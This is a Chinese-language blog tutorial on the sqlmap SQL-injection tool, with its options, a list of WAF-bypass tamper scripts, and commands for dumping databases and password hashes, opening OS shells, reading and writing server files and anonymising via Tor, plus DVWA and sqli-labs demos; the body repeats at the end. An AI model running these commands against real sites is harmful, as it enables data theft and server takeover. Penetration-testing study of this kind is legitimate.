园龄：1年6个月粉丝：55 关注：0

3.sqlmap使用教程2024-01-18

4.文件上传漏洞2024-01-25 5.upload-labs-main-v1.02024-01-26 6.文件包含漏洞2024-01-27 7.Google Hacking语法总结2023-09-07 8.pikachu通关教程（暴力破解）2024-01-28 9.Upload-labs2024-01-30 10.反序列化漏洞2024-02-06 11.RCE命令执行&代码执行漏洞2024-02-27 12.SSRF漏洞2024-04-04

sqlmap使用教程

sqlmap使用教程

1、介绍

SQLMAP是一个开放源码的渗透测试工具，它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎，为最终渗透测试人员提供很多强大的功能，可以拖库，可以访问底层的文件系统，还可以通过带外连接执行操作系统上的命令。

2、常用参数

 --version                         #显示程序的版本号并退出
-h, --help                        #显示此帮助消息并退出
-u                                #设置目标URL
-p                                #指定测试参数
-D                                #指定要进行枚举的数据库名
-U                                #指定要进行枚举的数据库表
-T       						#枚举列的信息
-C                                #指定要进行枚举的数据库列
-U                                #指定要进行枚举的数据车用户
--current-user                    #获取当前用户名称
--current-db                      #获取当前数据库名称
--cookie                          #设置cookie值
--dbs                             #列出数据库
--tables                          #列出数据库中的表
--columns                         #列出表中的列
--dump                            #列出表中的字段
--sql-shell                       #执行SQL命令
--os-cmd                          #执行系统命令
--os-shell                        #与系统交互shell
-r                                #加载外部请求包
--batch                           #使用默认参数进行
--data=DATA                       #通过POST发送数据字符串
--level=LEVEL                     #执行测试的等级（1-5，默认为1)
--risk=RISK                       #执行测试的风险（O-3，默认为1)
-v VERBOSE                        #详细级别:0-6(默认为1)
--proxy=PROXY                     #使用HTTP代理连接到目标URL
--user-agent                      #指定HTTP User-Agent
--tamper=TAMPER                   #使用给定的脚本(S)篡改注入数据
--random-agent                    #随机的请求头!

3、tamper脚本

 # 使用方法--tamper xxx.py
 
apostrophemask.py	# 用UTF-8全角字符替换单引号字符
apostrophenullencode.py 	# 用非法双字节unicode字符替换单引号字符
appendnullbyte.py	# 在payload末尾添加空字符编码
base64encode.py 	# 对给定的payload全部字符使用Base64编码
between.py		# 分别用“NOT BETWEEN 0 AND #”替换大于号“>”，“BETWEEN # AND #”替换等于号“=”
bluecoat.py 	# 在SQL语句之后用有效的随机空白符替换空格符，随后用“LIKE”替换等于号“=”
chardoubleencode.py 	# 对给定的payload全部字符使用双重URL编码（不处理已经编码的字符）
charencode.py	 # 对给定的payload全部字符使用URL编码（不处理已经编码的字符）
charunicodeencode.py 	 # 对给定的payload的非编码字符使用Unicode URL编码（不处理已经编码的字符）
concat2concatws.py 		# 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
equaltolike.py 		# 用“LIKE”运算符替换全部等于号“=”
greatest.py 		# 用“GREATEST”函数替换大于号“>”
halfversionedmorekeywords.py 	# 在每个关键字之前添加MySQL注释
ifnull2ifisnull.py 		# 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
lowercase.py 		# 用小写值替换每个关键字字符
modsecurityversioned.py 	# 用注释包围完整的查询
modsecurityzeroversioned.py 		# 用当中带有数字零的注释包围完整的查询
multiplespaces.py 		# 在SQL关键字周围添加多个空格
nonrecursivereplacement.py 		# 用representations替换预定义SQL关键字，适用于过滤器
overlongutf8.py 		# 转换给定的payload当中的所有字符
percentage.py 		# 在每个字符之前添加一个百分号
randomcase.py 		# 随机转换每个关键字字符的大小写
randomcomments.py 		# 向SQL关键字中插入随机注释
securesphere.py 		# 添加经过特殊构造的字符串
sp_password.py 		# 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
space2comment.py 		# 用“/**/”替换空格符
space2dash.py 		# 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符
space2hash.py 		# 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2morehash.py 		# 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2mssqlblank.py 		# 用一组有效的备选字符集当中的随机空白符替换空格符
space2mssqlhash.py 		# 用磅注释符“#”其次是一个换行符替换空格符
space2mysqlblank.py 		# 用一组有效的备选字符集当中的随机空白符替换空格符
space2mysqldash.py 			# 用破折号注释符“--”其次是一个换行符替换空格符
space2plus.py 		# 用加号“+”替换空格符
space2randomblank.py 		# 用一组有效的备选字符集当中的随机空白符替换空格符
unionalltounion.py 		# 用“UNION SELECT”替换“UNION ALL SELECT”
unmagicquotes.py 		# 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
varnish.py 				# 添加一个HTTP头“X-originating-IP”来绕过WAF
versionedkeywords.py 		# 用MySQL注释包围每个非函数关键字
versionedmorekeywords.py 		# 用MySQL注释包围每个关键字
xforwardedfor.py 			# 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF

4、使用示例

基础使用

 1、判断注入点和数据类型：
     (1) sqlmap -u http://www.test.php?id=1                 #GET方法注入
     (2) sqlmap -r /etc/url.txt                             #POST方法注入(使用Burpsuite等代理工具拦截POST请求内容，将POST请求内容保存在一个文本文件中，此处为url.txt，并用sqlmap调用)
2、判断数据库名(dbs)：sqlmap -u "http://www.test.php?id=1" --dbs
3、判断表名(tables)：sqlmap -u "http://www.test.php?id=1" -D 数据库名 --tables
4、判断列名(columns)：sqlmap -u "http://www.test.php?id=1"-D 数据库名 -T 表名 --column
5、获取字段: sqlmap -u "http://www.test.php?id=1" -D 数据库名 -T 表名 -C 列名 --dump

进阶使用

 sqlmap -u "http://url/news?id=1" --current-user                              #获取当前用户名称
sqlmap -u "http://url/news?id=1" --current-db                                #获取当前数据库名称
sqlmap -u "http://url/news?id=1" --dbs                               		#枚举所有数据库名
sqlmap -u "http://url/news?id=1" -D "db_name" --tables                       #列出指定数据库的表名
sqlmap -u "http://url/news?id=1" -D "db_name" -T "tablename" --columns       #列列出指定数据库对应表的字段
sqlmap -u "http://url/news?id=1" -D "db_name" -T "table_name" -C "column_name" --dump      #获取字段内容
sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users                      #dbms指定数据库类型
sqlmap -u "http://url/news?id=1" --users                                     #列数据车用户
sqlmap -u "http://url/news?id=1" --passwords                                 #数据库用户密码
sqlmap -u "http://url/news?id=1" --sql-shell/--os-cmd                        #执行指定sql命令
sqlmap -u "http://url/news?id=1" --os-cmd=whoami                             #执行系统命令
sqlmap -u "http://url/news?id=1" --os-shell                                  #系统交互shell
sqlmap -u "http://url/news?id=1" --dbs -o"sqImap.log"                        #保存进度
sqlmap -u "http://url/news?id=1" --dbs -o"sqlmap.log" --resume               #恢复已保存进度
sqlmap -u "http://url/news?id=1" --tamper "base64encode.py"                  #加载脚本(可利用绕过注入限制)
sqlmap -u "http://url/news?id=1" -p id  								  #指定注入参数
sqlmap -u "http://url/news?id=1" --dump-all                                  #爆出该数据库中的所有数据
sqlmap -u "http://url/news?id=1" --proxy="http://127.0.0.1:8080"  		     #指定代理
sqlmap -u "http://url/news?id=1" --delay=3 --force-ssl	     # 当爆破HTTPS网站会出现超时的话，可以使用参数
sqlmap -u "http://url/news?id=1" --is-dba 								   #判断当前用户是否有管理员权限
sqlmap -u "http://url/news?id=1" --identify-waf  						    # 检测是否有WAF
sqlmap -u "http://url/news?id=1" --file-read "c:/test.txt" #读取目标服务器C盘下的test.txt文件
sqlmap -u "http://url/news?id=1" --file-write  test.txt  --file-dest "e:/hack.txt"  #将本地的test.txt文件上传到目标服务器的E盘下，并且名字为hack.txt
 
===================================================================================
# 过waf手法
sqlmap -u "http://url/news?id=1"
--random-agent                                         # 使用任意的User-Agent爆破
-v3                                                    # 输出详细度，最大值5会显示请求包和回复包
--threads 5                                            # 指定线程数
--fresh-queries                                        # 清除缓存
--flush-session                                        # 清空会话，重构注入 
--batch                                                # 对所有的交互式的都是默认的
--random-agent                                         # 任意的http头
--tamper "base64encode.py "                            # 对提交的数据进行base64编码
--referer http://www.baidu.com                         # 伪造referer字段
--random-agent                                         # 使用任意HTTP头进行绕过，尤其是在WAF配置不当的时候
--time-sec=3                                           # 使用长的延时来避免触发WAF的机制，这方式比较耗时
--hpp                                                  # 使用HTTP 参数污染进行绕过，尤其是在ASP.NET/IIS 平台上
--proxy=http://127.0.0.1:7890                          # 使用代理进行绕过
--ignore-proxy   								    # 禁止使用系统的代理，直接连接进行注入
--flush-session  								    # 清空会话，重构注入
--hex 或者 --no-cast    							   # 进行字符码转换
--mobile         							         # 对移动端的服务器进行注入
--tor           							         # 匿名注入

直接使用

 python sqlmap.py -u "https://www.vuln.cn/post.php?id=1" --force-ssl  --proxy "http://127.0.0.1:7890" --batch --dbs
python sqlmap.py  -u "http://www.vuln.cn" –cookie "id=11" --level 2
python sqlmap.py -u "www.xxxx.com/product/detail/id/3*.html" --dbms=mysql -v 3 
python sqlmap.py -r "c:\request.txt" -p id –dbms mysql –file-read="e:\www\as\config.php"

5、案例演示

【sqlmap跑post的数据（含cookie）】

案例一：使用Sqlmap获取DVWA数据

dvwa-sql-Low

1、使用BP自带浏览器进行抓包(主要是抓取想要登入的cookie信息)

2、将数据包保存成文件，放入sqlmap目录下

3、加上-r参数带上数据包（如果数据包当中没有cookie信息的话，跑sqlmap时会重定向到登入页面--报浏览器302状态码）

结果就出来了

案例二：利用unmagicquotes脚本绕过magicquotes

 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-33/?id=1" --batch --tamper=unmagicquotes

 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-33/?id=1" --batch --tamper=unmagicquotes --current-db

上一篇常见sql注入绕过方法

下一篇web安全思维导图(白帽子)

posted @ 2024-01-18 09:09 gcc_com 阅读(698) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

carmi

sqlmap使用教程

sqlmap使用教程

1、介绍

2、常用参数

3、tamper脚本

4、使用示例

基础使用

进阶使用

直接使用

5、案例演示

案例一：使用Sqlmap获取DVWA数据

案例二：利用unmagicquotes脚本绕过magicquotes

公告

最新随笔

我的标签

合集 (9)

随笔档案 (97)

阅读排行榜

推荐排行榜

最新评论

	--version #显示程序的版本号并退出
	-h, --help #显示此帮助消息并退出
	-u #设置目标URL
	-p #指定测试参数
	-D #指定要进行枚举的数据库名
	-U #指定要进行枚举的数据库表
	-T #枚举列的信息
	-C #指定要进行枚举的数据库列
	-U #指定要进行枚举的数据车用户
	--current-user #获取当前用户名称
	--current-db #获取当前数据库名称
	--cookie #设置cookie值
	--dbs #列出数据库
	--tables #列出数据库中的表
	--columns #列出表中的列
	--dump #列出表中的字段
	--sql-shell #执行SQL命令
	--os-cmd #执行系统命令
	--os-shell #与系统交互shell
	-r #加载外部请求包
	--batch #使用默认参数进行
	--data=DATA #通过POST发送数据字符串
	--level=LEVEL #执行测试的等级（1-5，默认为1)
	--risk=RISK #执行测试的风险（O-3，默认为1)
	-v VERBOSE #详细级别:0-6(默认为1)
	--proxy=PROXY #使用HTTP代理连接到目标URL
	--user-agent #指定HTTP User-Agent
	--tamper=TAMPER #使用给定的脚本(S)篡改注入数据
	--random-agent #随机的请求头!

	# 使用方法--tamper xxx.py

	apostrophemask.py # 用UTF-8全角字符替换单引号字符
	apostrophenullencode.py # 用非法双字节unicode字符替换单引号字符
	appendnullbyte.py # 在payload末尾添加空字符编码
	base64encode.py # 对给定的payload全部字符使用Base64编码
	between.py # 分别用“NOT BETWEEN 0 AND #”替换大于号“>”，“BETWEEN # AND #”替换等于号“=”
	bluecoat.py # 在SQL语句之后用有效的随机空白符替换空格符，随后用“LIKE”替换等于号“=”
	chardoubleencode.py # 对给定的payload全部字符使用双重URL编码（不处理已经编码的字符）
	charencode.py # 对给定的payload全部字符使用URL编码（不处理已经编码的字符）
	charunicodeencode.py # 对给定的payload的非编码字符使用Unicode URL编码（不处理已经编码的字符）
	concat2concatws.py # 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
	equaltolike.py # 用“LIKE”运算符替换全部等于号“=”
	greatest.py # 用“GREATEST”函数替换大于号“>”
	halfversionedmorekeywords.py # 在每个关键字之前添加MySQL注释
	ifnull2ifisnull.py # 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
	lowercase.py # 用小写值替换每个关键字字符
	modsecurityversioned.py # 用注释包围完整的查询
	modsecurityzeroversioned.py # 用当中带有数字零的注释包围完整的查询
	multiplespaces.py # 在SQL关键字周围添加多个空格
	nonrecursivereplacement.py # 用representations替换预定义SQL关键字，适用于过滤器
	overlongutf8.py # 转换给定的payload当中的所有字符
	percentage.py # 在每个字符之前添加一个百分号
	randomcase.py # 随机转换每个关键字字符的大小写
	randomcomments.py # 向SQL关键字中插入随机注释
	securesphere.py # 添加经过特殊构造的字符串
	sp_password.py # 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
	space2comment.py # 用“/**/”替换空格符
	space2dash.py # 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符
	space2hash.py # 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
	space2morehash.py # 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
	space2mssqlblank.py # 用一组有效的备选字符集当中的随机空白符替换空格符
	space2mssqlhash.py # 用磅注释符“#”其次是一个换行符替换空格符
	space2mysqlblank.py # 用一组有效的备选字符集当中的随机空白符替换空格符
	space2mysqldash.py # 用破折号注释符“--”其次是一个换行符替换空格符
	space2plus.py # 用加号“+”替换空格符
	space2randomblank.py # 用一组有效的备选字符集当中的随机空白符替换空格符
	unionalltounion.py # 用“UNION SELECT”替换“UNION ALL SELECT”
	unmagicquotes.py # 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
	varnish.py # 添加一个HTTP头“X-originating-IP”来绕过WAF
	versionedkeywords.py # 用MySQL注释包围每个非函数关键字
	versionedmorekeywords.py # 用MySQL注释包围每个关键字
	xforwardedfor.py # 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF

	1、判断注入点和数据类型：
	(1) sqlmap -u http://www.test.php?id=1 #GET方法注入
	(2) sqlmap -r /etc/url.txt #POST方法注入(使用Burpsuite等代理工具拦截POST请求内容，将POST请求内容保存在一个文本文件中，此处为url.txt，并用sqlmap调用)
	2、判断数据库名(dbs)：sqlmap -u "http://www.test.php?id=1" --dbs
	3、判断表名(tables)：sqlmap -u "http://www.test.php?id=1" -D 数据库名 --tables
	4、判断列名(columns)：sqlmap -u "http://www.test.php?id=1"-D 数据库名 -T 表名 --column
	5、获取字段: sqlmap -u "http://www.test.php?id=1" -D 数据库名 -T 表名 -C 列名 --dump

	sqlmap -u "http://url/news?id=1" --current-user #获取当前用户名称
	sqlmap -u "http://url/news?id=1" --current-db #获取当前数据库名称
	sqlmap -u "http://url/news?id=1" --dbs #枚举所有数据库名
	sqlmap -u "http://url/news?id=1" -D "db_name" --tables #列出指定数据库的表名
	sqlmap -u "http://url/news?id=1" -D "db_name" -T "tablename" --columns #列列出指定数据库对应表的字段
	sqlmap -u "http://url/news?id=1" -D "db_name" -T "table_name" -C "column_name" --dump #获取字段内容
	sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users #dbms指定数据库类型
	sqlmap -u "http://url/news?id=1" --users #列数据车用户
	sqlmap -u "http://url/news?id=1" --passwords #数据库用户密码
	sqlmap -u "http://url/news?id=1" --sql-shell/--os-cmd #执行指定sql命令
	sqlmap -u "http://url/news?id=1" --os-cmd=whoami #执行系统命令
	sqlmap -u "http://url/news?id=1" --os-shell #系统交互shell
	sqlmap -u "http://url/news?id=1" --dbs -o"sqImap.log" #保存进度
	sqlmap -u "http://url/news?id=1" --dbs -o"sqlmap.log" --resume #恢复已保存进度
	sqlmap -u "http://url/news?id=1" --tamper "base64encode.py" #加载脚本(可利用绕过注入限制)
	sqlmap -u "http://url/news?id=1" -p id #指定注入参数
	sqlmap -u "http://url/news?id=1" --dump-all #爆出该数据库中的所有数据
	sqlmap -u "http://url/news?id=1" --proxy="http://127.0.0.1:8080" #指定代理
	sqlmap -u "http://url/news?id=1" --delay=3 --force-ssl # 当爆破HTTPS网站会出现超时的话，可以使用参数
	sqlmap -u "http://url/news?id=1" --is-dba #判断当前用户是否有管理员权限
	sqlmap -u "http://url/news?id=1" --identify-waf # 检测是否有WAF
	sqlmap -u "http://url/news?id=1" --file-read "c:/test.txt" #读取目标服务器C盘下的test.txt文件
	sqlmap -u "http://url/news?id=1" --file-write test.txt --file-dest "e:/hack.txt" #将本地的test.txt文件上传到目标服务器的E盘下，并且名字为hack.txt

	===================================================================================
	# 过waf手法
	sqlmap -u "http://url/news?id=1"
	--random-agent # 使用任意的User-Agent爆破
	-v3 # 输出详细度，最大值5会显示请求包和回复包
	--threads 5 # 指定线程数
	--fresh-queries # 清除缓存
	--flush-session # 清空会话，重构注入
	--batch # 对所有的交互式的都是默认的
	--random-agent # 任意的http头
	--tamper "base64encode.py " # 对提交的数据进行base64编码
	--referer http://www.baidu.com # 伪造referer字段
	--random-agent # 使用任意HTTP头进行绕过，尤其是在WAF配置不当的时候
	--time-sec=3 # 使用长的延时来避免触发WAF的机制，这方式比较耗时
	--hpp # 使用HTTP 参数污染进行绕过，尤其是在ASP.NET/IIS 平台上
	--proxy=http://127.0.0.1:7890 # 使用代理进行绕过
	--ignore-proxy # 禁止使用系统的代理，直接连接进行注入
	--flush-session # 清空会话，重构注入
	--hex 或者 --no-cast # 进行字符码转换
	--mobile # 对移动端的服务器进行注入
	--tor # 匿名注入

	python sqlmap.py -u "https://www.vuln.cn/post.php?id=1" --force-ssl --proxy "http://127.0.0.1:7890" --batch --dbs
	python sqlmap.py -u "http://www.vuln.cn" –cookie "id=11" --level 2
	python sqlmap.py -u "www.xxxx.com/product/detail/id/3*.html" --dbms=mysql -v 3
	python sqlmap.py -r "c:\request.txt" -p id –dbms mysql –file-read="e:\www\as\config.php"